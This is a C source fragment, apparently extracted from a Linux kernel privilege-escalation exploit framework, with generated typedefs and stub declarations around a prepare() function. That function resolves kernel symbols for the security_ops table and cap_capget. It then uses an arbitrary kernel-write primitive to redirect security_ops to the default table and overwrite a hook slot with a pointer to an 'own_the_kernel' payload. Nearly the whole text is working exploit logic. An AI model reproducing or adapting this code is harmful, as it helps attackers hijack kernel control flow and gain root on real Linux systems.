
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {unsigned long (* get_kernel_sym ) (char*) ;int own_the_kernel; } ;


 int default_sec ;
 TYPE_1__* exp_state ;
 int printf (char*) ;
 int restore ;
 unsigned long stub1 (char*) ;
 int stub2 (char*) ;
 int stub3 (char*) ;
 int super_memcpy (unsigned long,int*,int) ;
 unsigned long target ;

int prepare(unsigned char *buf)
{
    unsigned long addr;

    if (sizeof(long)!=8) {
        printf("Not enough bits\n");
        return 1;
    }

    printf("Reticulating splines...\n");

    addr = exp_state->get_kernel_sym("security_ops");
    default_sec = exp_state->get_kernel_sym("default_security_ops");
    restore = exp_state->get_kernel_sym("cap_capget");


    super_memcpy(addr, &default_sec, sizeof(void*));


    target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*));
    super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*));

    return 0;
}
